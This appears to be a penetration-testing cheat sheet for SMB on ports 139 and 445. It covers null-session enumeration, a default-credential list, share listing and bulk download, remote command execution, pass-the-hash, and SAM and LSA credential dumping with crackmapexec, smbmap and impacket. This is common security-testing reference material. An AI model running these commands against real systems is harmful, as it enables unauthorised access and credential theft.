139, 445 - SMB

Port 139

Port 139 is terferred to a 'NBT over IP'. The Network Basic Input Output System (NETBIOS) is a software product designed to enable objects in a local area network (LAN) to interact with network hardware an facilitate the transmission of data across the network.

Port 445

Port 445 is identified as 'SMB over IP'. SMB stands for Server Message Blocks, which is also known as Common Internet File System. As an application-layer network protocol, SMB/CIFS is primarily utilized to share files, printers, serial ports, across a network.

SMB

The Server Message Block (SMB) protocol is designed for regulating access to files, directories, and other network resources like printers or routers. Primarily utilized within the Windows operating system, SMB ensures backward compativility. The Samba project offers a free software solution for SMB implementation on Linux and Unix systems.

IPC$ Share

The IPC$ share can be accessed through an anonymous null session, allowing for interacting with services exposed via named pipes. enum4linuxcan be used to collect:

• Information on the operating system

• Details on the parent domain

• compilation of local users and groups

• information on available SMB shares

• effective system security policy

enum4linux -a target-ip

Common Credentials

(blank) : (blank)

guest : (blank)

Administrator, admin : (blank), password, administrator, admin

arcserve : arcserve, backup

tivoli, tmersrvd : tivoli, tmersvd, admin

backupexec, backup : backupexec, backup, arcada

test, lab, demo : password, test, lab, demo

List Shares using smbclient

smbclient -L //<ip>/

Enumerate Users, Groups & Logged On Users

crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]

ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "

enumdomusers
enumdomgroups

Enumerate Local Users

Impacket

lookupsid.py -no-pass hostname.local
impacket-lookupsid -no-pass hostname.local

Shared Folders Enumeration

Look if you can access anything that you find. If you don't have credentials, try using null credentials/guest user

List Shared Folders

smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%password]' -L [--pw-nt-hash] //<IP>  # if pwd is omitted, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash 

smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list

crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user

Connect/List a Shared Folder

#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls'  to list recursively with smbclient

#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash

smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)

From Windows Host

Powershell

# Retrieves SMB shares on local computer
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer
Get-SmbShare -CimSession "<computer name or session object>"
# Retrieves connections established from the local SMB client to the SMB servers.
Get-SmbConnection

CMD

# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all

Mount a Share on Linux

mount -t cifs //10.10.10.10/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share

Download files from a share

#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory

Execute Commands

crackmapexec

crackmapexec can execute commands abusing any of mmcexec, smbexec, atexec, wmiexec being wmiexec the default method.

apt-get install crackmapexec

crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash